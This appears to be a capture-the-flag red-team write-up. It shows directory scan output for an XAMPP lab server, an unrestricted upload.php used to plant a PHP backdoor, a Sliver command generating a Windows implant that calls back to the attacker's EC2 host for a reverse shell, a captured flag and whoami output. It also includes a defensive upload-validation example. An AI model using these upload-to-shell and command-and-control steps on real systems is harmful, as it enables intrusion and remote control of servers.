200      GET        7l       57w     2442c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/fastly-logo.png
200      GET      484l     2227w   119307c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-cakephp-6.png
200      GET      267l      982w    70802c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-manager.png
200      GET      317l     1398w   102812c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-network.png
200      GET      213l      796w   131162c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-macosx-stack-manager-volumes.jpg
200      GET      403l     2814w   283442c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/phpinfo-section-1.png
301      GET        9l       30w      391c http://redteam-w324duut.darklabhackaday.com/dashboard/ru => http://redteam-w324duut.darklabhackaday.com/dashboard/ru/
200      GET       10l       64w     2711c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/linux-logo.png
200      GET      198l      879w   148586c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-macosx-stack-manager.jpg
200      GET       19l      154w    11138c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/social-icons-large@2x.png
200      GET      209l      978w   166567c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-macosx-stack-manager-general.jpg
200      GET      514l     2774w   217526c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-tray.png
200      GET       17l      132w     9021c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/social-icons@2x.png
200      GET       11l       79w     4243c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/background.png
200      GET      261l     1347w   101068c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-general.png
200      GET      190l      939w   149693c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-macosx-stack-manager-services.jpg
200      GET      213l      962w   121742c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-macosx-download-installer.jpg
200      GET      646l     2898w   150902c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/xampp-vm-cakephp-7.png
200      GET      230l     1035w   160961c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-macosx-stack-manager-network.jpg
200      GET      192l      819w   111554c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-macosx-launch-credentials.jpg
200      GET      453l     2324w   158417c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/bitnami-xampp/image5.png
200      GET      200l      516w    30995c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/bitnami-xampp/image6.png
200      GET       87l      511w    34878c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/bitnami-xampp/image2.png
200      GET       82l      513w    37591c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/bitnami-xampp/image1.png
200      GET       57l      329w    30430c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/bitnami-xampp/image4.png
200      GET      361l     1179w    63156c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/bitnami-xampp/image7.png
200      GET      428l     5896w   332579c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/phpinfo-section-2.png
200      GET      662l     2987w   200091c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/bitnami-xampp/image3.png
200      GET      990l     7221w   899476c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-macosx-start.jpg
200      GET      950l     4698w   417860c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/blog/heartbleed-affected-osx.png
200      GET      385l     1620w   180620c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-macosx-run-installer.jpg
200      GET       37l      265w    20115c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/stack-icons.png
200      GET      996l     7189w   909082c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-windows-start.jpg
200      GET      509l     2484w   251673c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-macosx-wordpress.jpg
200      GET     1071l     7077w   888496c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/screenshots/xampp-linux-start.jpg
200      GET       63l      321w    29058c http://redteam-w324duut.darklabhackaday.com/dashboard/Images/xampp-cloud.png
301      GET        9l       30w      391c http://redteam-w324duut.darklabhackaday.com/dashboard/it => http://redteam-w324duut.darklabhackaday.com/dashboard/it/
301      GET        9l       30w      391c http://redteam-w324duut.darklabhackaday.com/dashboard/jp => http://redteam-w324duut.darklabhackaday.com/dashboard/jp/
200      GET      130l      433w     5422c http://redteam-w324duut.darklabhackaday.com/dashboard/ru/index.html
200      GET      516l     3545w    46038c http://redteam-w324duut.darklabhackaday.com/dashboard/ru/FAQ.html
200      GET      516l     3545w    46038c http://redteam-w324duut.darklabhackaday.com/dashboard/ru/faq.html
200      GET      130l      433w     5422c http://redteam-w324duut.darklabhackaday.com/dashboard/ru/Index.html
200      GET      130l      444w     5275c http://redteam-w324duut.darklabhackaday.com/dashboard/it/index.html
200      GET      516l     3885w    33903c http://redteam-w324duut.darklabhackaday.com/dashboard/it/faq.html
200      GET      516l     3885w    33903c http://redteam-w324duut.darklabhackaday.com/dashboard/it/FAQ.html
200      GET      114l      290w     4140c http://redteam-w324duut.darklabhackaday.com/dashboard/404.html
301      GET        9l       30w      382c http://redteam-w324duut.darklabhackaday.com/IMG => http://redteam-w324duut.darklabhackaday.com/IMG/
200      GET        5l        9w      694c http://redteam-w324duut.darklabhackaday.com/IMG/module_table_top.png
200      GET        3l       16w     1549c http://redteam-w324duut.darklabhackaday.com/IMG/module_table_bottom.png
200      GET      123l      380w     5715c http://redteam-w324duut.darklabhackaday.com/dashboard/it/howto.html
200      GET      130l      444w     5275c http://redteam-w324duut.darklabhackaday.com/dashboard/it/Index.html
200      GET      233l      790w     8615c http://redteam-w324duut.darklabhackaday.com/dashboard/Docs/create-framework-project-zf1.html
200      GET        9l       24w      212c http://redteam-w324duut.darklabhackaday.com/dashboard/Docs/access-phpmyadmin-remotely.pdfmarks
200      GET     2007l     7708w   329917c http://redteam-w324duut.darklabhackaday.com/dashboard/Docs/transfer-files-ftp.pdf
200      GET      130l      442w     5311c http://redteam-w324duut.darklabhackaday.com/dashboard/de/index.html
200      GET      516l     3759w    35477c http://redteam-w324duut.darklabhackaday.com/dashboard/de/faq.html
200      GET      130l      436w     5268c http://redteam-w324duut.darklabhackaday.com/dashboard/es/index.html
200      GET      516l     3776w    33076c http://redteam-w324duut.darklabhackaday.com/dashboard/es/faq.html
301      GET        9l       30w      393c http://redteam-w324duut.darklabhackaday.com/dashboard/Docs => http://redteam-w324duut.darklabhackaday.com/dashboard/Docs/
200      GET      130l      440w     5322c http://redteam-w324duut.darklabhackaday.com/dashboard/pl/index.html
200      GET      516l     3461w    33735c http://redteam-w324duut.darklabhackaday.com/dashboard/pl/faq.html
302      GET        0l        0w        0c http://redteam-w324duut.darklabhackaday.com/INDEX.php => http://redteam-w324duut.darklabhackaday.com/dashboard/
200      GET      130l      439w     5274c http://redteam-w324duut.darklabhackaday.com/dashboard/fr/index.html
200      GET      516l     3781w    33475c http://redteam-w324duut.darklabhackaday.com/dashboard/fr/faq.html
200      GET      130l      427w     5239c http://redteam-w324duut.darklabhackaday.com/dashboard/tr/index.html
200      GET      516l     3378w    33677c http://redteam-w324duut.darklabhackaday.com/dashboard/tr/faq.html
200      GET      516l     3759w    35477c http://redteam-w324duut.darklabhackaday.com/dashboard/de/FAQ.html
200      GET      516l     3461w    33735c http://redteam-w324duut.darklabhackaday.com/dashboard/pl/FAQ.html
200      GET      516l     3776w    33076c http://redteam-w324duut.darklabhackaday.com/dashboard/es/FAQ.html
200      GET      130l      410w     5366c http://redteam-w324duut.darklabhackaday.com/dashboard/jp/index.html
200      GET      516l     3272w    33666c http://redteam-w324duut.darklabhackaday.com/dashboard/jp/faq.html
301      GET        9l       30w      391c http://redteam-w324duut.darklabhackaday.com/dashboard/ro => http://redteam-w324duut.darklabhackaday.com/dashboard/ro/
200      GET      123l      379w     5733c http://redteam-w324duut.darklabhackaday.com/dashboard/de/howto.html
200      GET      516l     3781w    33475c http://redteam-w324duut.darklabhackaday.com/dashboard/fr/FAQ.html
200      GET      516l     3378w    33677c http://redteam-w324duut.darklabhackaday.com/dashboard/tr/FAQ.html
200      GET      123l      381w     5743c http://redteam-w324duut.darklabhackaday.com/dashboard/pl/howto.html
200      GET      123l      380w     5726c http://redteam-w324duut.darklabhackaday.com/dashboard/es/howto.html
200      GET      123l      380w     5726c http://redteam-w324duut.darklabhackaday.com/dashboard/fr/howto.html
200      GET      123l      377w     5702c http://redteam-w324duut.darklabhackaday.com/dashboard/tr/howto.html
200      GET      130l      447w     5315c http://redteam-w324duut.darklabhackaday.com/dashboard/ro/index.html
200      GET      516l     3732w    33775c http://redteam-w324duut.darklabhackaday.com/dashboard/ro/faq.html
200      GET      130l      440w     5322c http://redteam-w324duut.darklabhackaday.com/dashboard/pl/Index.html
200      GET      516l     3272w    33666c http://redteam-w324duut.darklabhackaday.com/dashboard/jp/FAQ.html
200      GET      130l      439w     5274c http://redteam-w324duut.darklabhackaday.com/dashboard/fr/Index.html
200      GET      130l      427w     5239c http://redteam-w324duut.darklabhackaday.com/dashboard/tr/Index.html
200      GET      123l      375w     5709c http://redteam-w324duut.darklabhackaday.com/dashboard/jp/howto.html
200      GET      516l     3732w    33775c http://redteam-w324duut.darklabhackaday.com/dashboard/ro/FAQ.html
301      GET        9l       30w      391c http://redteam-w324duut.darklabhackaday.com/dashboard/IT => http://redteam-w324duut.darklabhackaday.com/dashboard/IT/
200      GET      130l      410w     5366c http://redteam-w324duut.darklabhackaday.com/dashboard/jp/Index.html
200      GET      123l      382w     5728c http://redteam-w324duut.darklabhackaday.com/dashboard/ro/howto.html
301      GET        9l       30w      395c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES => http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/
200      GET        5l       47w     2036c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/apple-logo.png
200      GET       11l       79w     4243c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/background.png
200      GET        5l       47w     2036c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/appleVM-logo.png
200      GET       27l      253w    19113c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/sourceforge-logo@2x.png
200      GET       50l       99w     5427c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/xampp-logo.svg
200      GET        6l       66w     2819c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/windows-logo.png
200      GET       19l      154w    11138c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/social-icons-large@2x.png
200      GET       15l       93w     6731c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/pdf-icon.png
200      GET        8l       76w     4088c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/fastly-logo@2x.png
200      GET        7l       57w     2442c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/fastly-logo.png
200      GET       16l      155w    10943c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/sourceforge-logo.png
200      GET       33l      214w    12599c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/social-icons-large.png
200      GET       17l      132w     9021c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/social-icons@2x.png
200      GET        7l       76w     3900c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/favicon.png
200      GET       13l       93w     5327c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/social-icons.png
200      GET       10l       64w     2711c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/linux-logo.png
200      GET       85l      555w    39860c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/bitnami-xampp.png
200      GET       53l      392w    31074c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/addons-video-thumb.png
200      GET       40l      202w    14635c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/xampp-newsletter-logo.png
200      GET       63l      321w    29058c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/xampp-cloud.png
200      GET       37l      265w    20115c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/stack-icons.png
200      GET      357l     1795w   138791c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/twitter-bird.png
200      GET       71l      573w    44633c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/middleman.png
200      GET       57l      329w    30430c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/bitnami-xampp/image4.png
200      GET      200l      516w    30995c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/bitnami-xampp/image6.png
200      GET      361l     1179w    63156c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/bitnami-xampp/image7.png
200      GET       82l      513w    37591c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/bitnami-xampp/image1.png
200      GET      293l      799w    40142c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-3.png
200      GET      247l      765w    41974c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-php-output.png
200      GET       59l      418w    30054c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/team/daniel-lopez.png
200      GET       53l      283w    18022c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/team/paul-hinz.jpg
200      GET      415l      982w    45676c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-11.png
200      GET       71l      429w    32552c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/team/kay-vogelgesang.jpg
200      GET      391l      736w    32055c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-10.png
200      GET       82l      353w    27184c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/team/beltran-rueda.png
200      GET      118l      462w    38225c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/team/kai-seidler.jpg
200      GET      238l      900w    46506c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-2.png
200      GET       18l       77w     3411c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/stamps/stamp-173x38.gif
200      GET        5l       25w     1570c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/stamps/stamp-88x31.gif
200      GET        3l       13w     1665c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/stamps/stamp-80x15.gif
200      GET      267l      982w    70802c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-manager.png
200      GET       69l      596w    45129c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/download-xampp-vm.png
200      GET     1085l     2446w    95994c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-8.png
200      GET      453l     2324w   158417c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/bitnami-xampp/image5.png
200      GET      388l     2189w   119541c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-9.png
200      GET      198l      879w   148586c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-macosx-stack-manager.jpg
200      GET      213l      796w   131162c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-macosx-stack-manager-volumes.jpg
200      GET      662l     2987w   200091c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/bitnami-xampp/image3.png
200      GET      192l      819w   111554c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-macosx-launch-credentials.jpg
200      GET      514l     2774w   217526c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-tray.png
200      GET      269l      825w    45058c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-1.png
200      GET      190l      939w   149693c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-macosx-stack-manager-services.jpg
200      GET      306l     1208w    87718c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-volumes.png
200      GET      209l      978w   166567c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-macosx-stack-manager-general.jpg
200      GET      646l     2898w   150902c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-7.png
200      GET      261l     1347w   101068c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-general.png
200      GET      385l     1620w   180620c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-macosx-run-installer.jpg
200      GET      484l     2227w   119307c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-6.png
200      GET      293l     1440w    75826c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-4.png
200      GET       87l      511w    34878c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/bitnami-xampp/image2.png
200      GET      509l     2484w   251673c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-macosx-wordpress.jpg
200      GET      950l     4698w   417860c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/heartbleed-affected-osx.png
200      GET      317l     1398w   102812c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-network.png
200      GET      732l     2220w   112133c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-cakephp-5.png
200      GET      356l     2370w   238837c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/heartbleed-fixed.png
200      GET      990l     7221w   899476c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-macosx-start.jpg
200      GET      428l     5896w   332579c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/phpinfo-section-2.png
200      GET     1071l     7077w   888496c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-linux-start.jpg
200      GET      403l     2814w   283442c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/phpinfo-section-1.png
200      GET      440l     2399w   256922c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/heartbleed-affected.png
200      GET      415l     3307w   178294c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/blog/xampp-vm-php-finder.png
200      GET      996l     7189w   909082c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-windows-start.jpg
200      GET      213l      962w   121742c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-macosx-download-installer.jpg
200      GET      230l     1035w   160961c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/screenshots/xampp-macosx-stack-manager-network.jpg
200      GET       37l      267w    20117c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/stack-icons@2x.png
200      GET      116l      679w    55358c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/xampp-cloud@2x.png
301      GET        9l       30w      391c http://redteam-w324duut.darklabhackaday.com/dashboard/DE => http://redteam-w324duut.darklabhackaday.com/dashboard/DE/
200      GET      130l      444w     5275c http://redteam-w324duut.darklabhackaday.com/dashboard/IT/index.html
200      GET      130l      442w     5311c http://redteam-w324duut.darklabhackaday.com/dashboard/DE/index.html
200      GET      516l     3885w    33903c http://redteam-w324duut.darklabhackaday.com/dashboard/IT/faq.html
301      GET        9l       30w      401c http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/flags => http://redteam-w324duut.darklabhackaday.com/dashboard/IMAGES/flags/
200      GET      516l     3759w    35477c http://redteam-w324duut.darklabhackaday.com/dashboard/DE/faq.html
200      GET      123l      377w     5680c http://redteam-w324duut.darklabhackaday.com/dashboard/HOWTO.html
200      GET      516l     3885w    33903c http://redteam-w324duut.darklabhackaday.com/dashboard/IT/FAQ.html
200      GET      516l     3759w    35477c http://redteam-w324duut.darklabhackaday.com/dashboard/DE/FAQ.html
200      GET      123l      380w     5715c http://redteam-w324duut.darklabhackaday.com/dashboard/IT/howto.html
301      GET        9l       30w      391c http://redteam-w324duut.darklabhackaday.com/dashboard/FR => http://redteam-w324duut.darklabhackaday.com/dashboard/FR/
200      GET      130l      444w     5275c http://redteam-w324duut.darklabhackaday.com/dashboard/IT/Index.html
200      GET      123l      379w     5733c http://redteam-w324duut.darklabhackaday.com/dashboard/DE/howto.html
200      GET      130l      442w     5311c http://redteam-w324duut.darklabhackaday.com/dashboard/DE/Index.html
200      GET      130l      439w     5274c http://redteam-w324duut.darklabhackaday.com/dashboard/FR/index.html
200      GET      516l     3781w    33475c http://redteam-w324duut.darklabhackaday.com/dashboard/FR/faq.html
200      GET      123l      377w     5743c http://redteam-w324duut.darklabhackaday.com/dashboard/ru/HOWTO.html
200      GET      516l     3781w    33475c http://redteam-w324duut.darklabhackaday.com/dashboard/FR/FAQ.html
200      GET      130l      436w     5187c http://redteam-w324duut.darklabhackaday.com/dashboard/INDEX.html
200      GET      123l      380w     5726c http://redteam-w324duut.darklabhackaday.com/dashboard/FR/howto.html
200      GET      130l      439w     5274c http://redteam-w324duut.darklabhackaday.com/dashboard/FR/Index.html
301      GET        9l       30w      391c http://redteam-w324duut.darklabhackaday.com/dashboard/TR => http://redteam-w324duut.darklabhackaday.com/dashboard/TR/
200      GET      516l     3378w    33677c http://redteam-w324duut.darklabhackaday.com/dashboard/TR/faq.html
200      GET      130l      427w     5239c http://redteam-w324duut.darklabhackaday.com/dashboard/TR/index.html
200      GET      130l      433w     5422c http://redteam-w324duut.darklabhackaday.com/dashboard/ru/INDEX.html
200      GET      123l      377w     5702c http://redteam-w324duut.darklabhackaday.com/dashboard/TR/howto.html
301      GET        9l       30w      391c http://redteam-w324duut.darklabhackaday.com/dashboard/ur => http://redteam-w324duut.darklabhackaday.com/dashboard/ur/
200      GET      130l      427w     5239c http://redteam-w324duut.darklabhackaday.com/dashboard/TR/Index.html
200      GET      130l      444w     5275c http://redteam-w324duut.darklabhackaday.com/dashboard/it/INDEX.html
200      GET      123l      379w     5733c http://redteam-w324duut.darklabhackaday.com/dashboard/de/HOWTO.html
200      GET      130l      448w     5347c http://redteam-w324duut.darklabhackaday.com/dashboard/ur/index.html
301      GET        9l       30w      382c http://redteam-w324duut.darklabhackaday.com/Img => http://redteam-w324duut.darklabhackaday.com/Img/
200      GET      516l     4611w    42883c http://redteam-w324duut.darklabhackaday.com/dashboard/ur/faq.html
200      GET        3l       16w     1549c http://redteam-w324duut.darklabhackaday.com/Img/module_table_bottom.png
200      GET        5l        9w      694c http://redteam-w324duut.darklabhackaday.com/Img/module_table_top.png
200      GET      123l      381w     5743c http://redteam-w324duut.darklabhackaday.com/dashboard/pl/HOWTO.html
200      GET      123l      380w     5726c http://redteam-w324duut.darklabhackaday.com/dashboard/es/HOWTO.html
200      GET      123l      377w     5702c http://redteam-w324duut.darklabhackaday.com/dashboard/tr/HOWTO.html
200      GET      516l     4611w    42883c http://redteam-w324duut.darklabhackaday.com/dashboard/ur/FAQ.html
200      GET      123l      375w     5709c http://redteam-w324duut.darklabhackaday.com/dashboard/jp/HOWTO.html
200      GET      123l      385w     5786c http://redteam-w324duut.darklabhackaday.com/dashboard/ur/howto.html
200      GET      123l      382w     5728c http://redteam-w324duut.darklabhackaday.com/dashboard/ro/HOWTO.html
200      GET      130l      448w     5347c http://redteam-w324duut.darklabhackaday.com/dashboard/ur/Index.html
200      GET      130l      442w     5311c http://redteam-w324duut.darklabhackaday.com/dashboard/de/INDEX.html
200      GET      130l      440w     5322c http://redteam-w324duut.darklabhackaday.com/dashboard/pl/INDEX.html
200      GET      130l      436w     5268c http://redteam-w324duut.darklabhackaday.com/dashboard/es/INDEX.html
200      GET      130l      439w     5274c http://redteam-w324duut.darklabhackaday.com/dashboard/fr/INDEX.html
200      GET      123l      380w     5715c http://redteam-w324duut.darklabhackaday.com/dashboard/IT/HOWTO.html
200      GET      123l      379w     5733c http://redteam-w324duut.darklabhackaday.com/dashboard/DE/HOWTO.html
200      GET      130l      447w     5315c http://redteam-w324duut.darklabhackaday.com/dashboard/ro/INDEX.html
301      GET        9l       30w      391c http://redteam-w324duut.darklabhackaday.com/dashboard/PL => http://redteam-w324duut.darklabhackaday.com/dashboard/PL/
200      GET      130l      440w     5322c http://redteam-w324duut.darklabhackaday.com/dashboard/PL/index.html
200      GET      516l     3461w    33735c http://redteam-w324duut.darklabhackaday.com/dashboard/PL/faq.html
301      GET        9l       30w      386c http://redteam-w324duut.darklabhackaday.com/Uploads => http://redteam-w324duut.darklabhackaday.com/Uploads/
200      GET       16l       32w      406c http://redteam-w324duut.darklabhackaday.com/Uploads/upload.php
200      GET      130l      444w     5275c http://redteam-w324duut.darklabhackaday.com/dashboard/IT/INDEX.html
200      GET      130l      442w     5311c http://redteam-w324duut.darklabhackaday.com/dashboard/DE/INDEX.html
200      GET      123l      381w     5743c http://redteam-w324duut.darklabhackaday.com/dashboard/PL/howto.html

Among all of these results, the one worth attention is the Uploads directory, which contains a file called upload.php. This script lets anyone upload a file of ANY type onto the server, with no restriction on extension or content.

So, I uploaded a simple PHP backdoor, and the response reported that the file had been stored in the /inventory_files directory.

Going there, sure enough, our file is there!

Doing a simple whoami shows that our backdoor works!
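For contrast, here is what a file-upload handler that would have stopped this needs to check. This is an added Python example written for this write-up; it is not the challenge's upload.php and not code from the CTF. The allowed-extension table, the magic bytes and the storage path /srv/app-data/inventory_files are assumptions. insecure_store() mirrors the behaviour observed above (trust the client's filename, store under the web root); validate_upload() is the hardened version.

```python
import os
import secrets

# Allowed extension -> magic bytes the content must start with (assumed table).
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".pdf": b"%PDF-",
}

# Assumed storage root, deliberately outside the web root: a file that still
# slips through cannot be fetched as /inventory_files/shell.php and executed.
UPLOAD_ROOT = "/srv/app-data/inventory_files"


def insecure_store(filename: str) -> str:
    """What the observed upload.php effectively does: trust the client's
    filename and put the file under the web root. Returns the URL path the
    backdoor became reachable at (no I/O here)."""
    return "/inventory_files/" + filename


def validate_upload(filename: str, content: bytes):
    """Hardened version. Returns (ok, reason, stored_path); stored_path is a
    random name that keeps only the validated extension, so the client
    controls neither the name nor the extension of what lands on disk."""
    if "/" in filename or "\\" in filename:
        return False, "path separator in filename", None
    if filename in ("", ".", ".."):
        return False, "empty filename", None
    _root, ext = os.path.splitext(filename)
    ext = ext.lower()
    if ext not in ALLOWED:
        return False, f"extension {ext or '(none)'} not allowed", None
    # shell.php.png ends in .png, so the allowlist alone is not enough:
    # the bytes must look like what the extension claims.
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match extension", None
    # A valid PNG header followed by PHP is still PHP to a handler that
    # dispatches on the wrong thing. Reject the polyglot outright.
    if b"<?php" in content or b"<?=" in content:
        return False, "embedded PHP tag", None
    stored = secrets.token_hex(16) + ext
    return True, "ok", os.path.join(UPLOAD_ROOT, stored)
```

The order matters: strip path components first, then allowlist the extension, then check the content against what the extension claims, and finally throw the client's filename away entirely. Storing outside the web root is what turns the residual risk (a polyglot that passes every check) into a download problem rather than a code-execution one.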

Getting a Reverse Shell


So, to get a reverse shell on Sliver, an implant must be generated:

sliver > generate --mtls <EC2_IP_ADDRESS> --os windows --arch amd64 --format exe 

Once the implant has been generated, start the mTLS listener (port 8888 by default; it must be reachable from the target, so that port has to be open in the EC2 security group) with

sliver > mtls

The implant was uploaded through upload.php and launched with the PHP backdoor from the previous step. That gave us initial access, and a quick look around the file system turned up the flag!

Hack{[673878f24c96770007e3f614bb391eea56e2e8c36530e328ab937fca5c46de9f]}

Internal Server - starting point


Category : Red Team

Points : 50

Good job and welcome! Easy flag

sliver (SOLID_DEVIANCE) > sa-whoami

[*] Successfully executed sa-whoami (coff-loader)
[*] Got output:

UserName               SID
====================== ====================================
WEB-SRV01\web_root     S-1-5-21-496616251-2340469536-2080137254-1008


GROUP INFORMATION                                 Type                     SID                                          Attributes               
================================================= ===================== ============================================= ==================================================
WEB-SRV01\None                                    Group                    S-1-5-21-496616251-2340469536-2080137254-513  Mandatory group, Enabled by default, Enabled group, 
Everyone                                          Well-known group         S-1-1-0                                       Mandatory group, Enabled by default, Enabled group, 
BUILTIN\Users                                     Alias                    S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\SERVICE                              Well-known group         S-1-5-6                                       Mandatory group, Enabled by default, Enabled group, 
CONSOLE LOGON                                     Well-known group         S-1-2-1                                       Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\Authenticated Users                  Well-known group         S-1-5-11                                      Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\This Organization                    Well-known group         S-1-5-15                                      Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\Local account                        Well-known group         S-1-5-113                                     Mandatory group, Enabled by default, Enabled group, 
LOCAL                                             Well-known group         S-1-2-0                                       Mandatory group, Enabled by default, Enabled group, 
NT AUTHORITY\NTLM Authentication                  Well-known group         S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group, 
Mandatory Label\High Mandatory Level              Label                    S-1-16-12288                                  Mandatory group, Enabled by default, Enabled group, 


Privilege Name                Description                                       State                         
============================= ================================================= ===========================
SeChangeNotifyPrivilege       Bypass traverse checking                          Enabled                       
SeImpersonatePrivilege        Impersonate a client after authentication         Enabled                       
SeCreateGlobalPrivilege       Create global objects                             Enabled                       
